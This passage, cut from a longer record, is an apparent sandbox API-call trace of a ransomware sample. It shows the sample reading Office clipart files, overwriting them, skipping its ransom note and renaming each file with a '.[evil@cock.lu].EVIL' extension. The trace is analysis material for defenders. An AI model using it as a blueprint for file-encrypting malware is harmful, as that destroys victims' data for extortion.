_String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.206] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01154_.WMF") returned 0x0 [0159.206] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF") returned 0x45 [0159.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.209] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x15b0, lpOverlapped=0x0) returned 1 [0159.228] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.228] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.228] _errno () returned 0x84b1160840 [0159.228] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.228] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x15c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x15c0, lpOverlapped=0x0) returned 1 [0159.228] CloseHandle (hObject=0x1a8) returned 1 [0159.228] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.229] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.229] __uncaught_exception () returned 0x84b1160800 [0159.229] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.229] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01154_.wmf.[evil@cock.lu].evil")) returned 1 [0159.230] ??_V@YAXPEAX@Z () returned 0x1 [0159.234] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01154_.WMF", dwFileAttributes=0x200) returned 0 [0159.234] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.234] wcsstr (_Str="NA01157_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.234] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF") returned 69 [0159.234] wcscmp (_String1="NA01157_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.234] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01157_.WMF") returned 0x0 [0159.234] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF") returned 0x45 [0159.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.237] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1858, lpOverlapped=0x0) returned 1 [0159.244] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.244] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.244] _errno () returned 0x84b1160840 [0159.244] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.245] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1860, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1860, lpOverlapped=0x0) returned 1 [0159.245] CloseHandle (hObject=0x1a8) returned 1 [0159.245] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.245] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.245] __uncaught_exception () returned 0x84b1160800 [0159.245] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.245] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01157_.wmf.[evil@cock.lu].evil")) returned 1 [0159.247] ??_V@YAXPEAX@Z () returned 0x1 [0159.250] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01157_.WMF", dwFileAttributes=0x200) returned 0 [0159.250] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.250] wcsstr (_Str="NA01158_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.250] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF") returned 69 [0159.250] wcscmp (_String1="NA01158_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.251] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01158_.WMF") returned 0x0 [0159.251] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF") returned 0x45 [0159.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.253] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1c74, lpOverlapped=0x0) returned 1 [0159.269] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.269] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.269] _errno () returned 0x84b1160840 [0159.269] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.269] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1c80, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1c80, lpOverlapped=0x0) returned 1 [0159.269] CloseHandle (hObject=0x1a8) returned 1 [0159.270] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.270] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.270] __uncaught_exception () returned 0x84b1160800 [0159.270] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.270] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01158_.wmf.[evil@cock.lu].evil")) returned 1 [0159.271] ??_V@YAXPEAX@Z () returned 0x1 [0159.275] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01158_.WMF", dwFileAttributes=0x200) returned 0 [0159.275] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.275] wcsstr (_Str="NA01161_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.275] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF") returned 69 [0159.275] wcscmp (_String1="NA01161_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.275] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01161_.WMF") returned 0x0 [0159.275] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF") returned 0x45 [0159.275] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.277] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1694, lpOverlapped=0x0) returned 1 [0159.281] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.281] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.281] _errno () returned 0x84b1160840 [0159.281] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.281] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x16a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16a0, lpOverlapped=0x0) returned 1 [0159.282] CloseHandle (hObject=0x1a8) returned 1 [0159.282] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.282] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.282] __uncaught_exception () returned 0x84b1160800 [0159.282] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.282] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01161_.wmf.[evil@cock.lu].evil")) returned 1 [0159.283] ??_V@YAXPEAX@Z () returned 0x1 [0159.286] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01161_.WMF", dwFileAttributes=0x200) returned 0 [0159.286] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.286] wcsstr (_Str="NA01164_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.286] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF") returned 69 [0159.286] wcscmp (_String1="NA01164_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.286] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01164_.WMF") returned 0x0 [0159.286] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF") returned 0x45 [0159.286] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.289] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xa04, lpOverlapped=0x0) returned 1 [0159.296] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.296] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.296] _errno () returned 0x84b1160840 [0159.296] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.296] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xa20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xa20, lpOverlapped=0x0) returned 1 [0159.296] CloseHandle (hObject=0x1a8) returned 1 [0159.296] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.297] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.297] __uncaught_exception () returned 0x84b1160800 [0159.297] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.298] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01164_.wmf.[evil@cock.lu].evil")) returned 1 [0159.299] ??_V@YAXPEAX@Z () returned 0x1 [0159.304] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01164_.WMF", dwFileAttributes=0x200) returned 0 [0159.304] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.304] wcsstr (_Str="NA01293_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.304] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF") returned 69 [0159.304] wcscmp (_String1="NA01293_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.304] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01293_.WMF") returned 0x0 [0159.304] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF") returned 0x45 [0159.304] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.308] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x70f0, lpOverlapped=0x0) returned 1 [0159.320] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.320] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.320] _errno () returned 0x84b1160840 [0159.320] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.320] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7100, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7100, lpOverlapped=0x0) returned 1 [0159.320] CloseHandle (hObject=0x1a8) returned 1 [0159.320] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.321] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.321] __uncaught_exception () returned 0x84b1160800 [0159.321] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.321] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01293_.wmf.[evil@cock.lu].evil")) returned 1 [0159.322] ??_V@YAXPEAX@Z () returned 0x1 [0159.327] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01293_.WMF", dwFileAttributes=0x200) returned 0 [0159.327] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.327] wcsstr (_Str="NA01354_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.327] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF") returned 69 [0159.327] wcscmp (_String1="NA01354_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.327] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01354_.WMF") returned 0x0 [0159.327] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF") returned 0x45 [0159.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.330] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x16ae, lpOverlapped=0x0) returned 1 [0159.339] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.339] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.339] _errno () returned 0x84b1160840 [0159.339] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.339] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x16c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x16c0, lpOverlapped=0x0) returned 1 [0159.339] CloseHandle (hObject=0x1a8) returned 1 [0159.339] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.340] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.340] __uncaught_exception () returned 0x84b1160800 [0159.340] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.340] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01354_.wmf.[evil@cock.lu].evil")) returned 1 [0159.341] ??_V@YAXPEAX@Z () returned 0x1 [0159.345] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01354_.WMF", dwFileAttributes=0x200) returned 0 [0159.345] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.345] wcsstr (_Str="NA01356_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.345] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF") returned 69 [0159.345] wcscmp (_String1="NA01356_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.345] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01356_.WMF") returned 0x0 [0159.345] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF") returned 0x45 [0159.345] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0159.348] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4732, lpOverlapped=0x0) returned 1 [0159.357] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.357] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0159.357] _errno () returned 0x84b1160840 [0159.357] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0159.357] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x4740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4740, lpOverlapped=0x0) returned 1 [0159.357] CloseHandle (hObject=0x1a8) returned 1 [0159.358] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0159.358] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0159.358] __uncaught_exception () returned 0x84b1160800 [0159.358] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0159.358] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\na01356_.wmf.[evil@cock.lu].evil")) returned 1 [0159.360] ??_V@YAXPEAX@Z () returned 0x1 [0159.363] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01356_.WMF", dwFileAttributes=0x200) returned 0 [0159.363] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0159.363] wcsstr (_Str="NA01357_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0159.363] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF") returned 69 [0159.363] wcscmp (_String1="NA01357_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0159.363] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="NA01357_.WMF") returned 0x0 [0159.364] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\NA01357_.WMF") returned 0x45 [0159.364] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 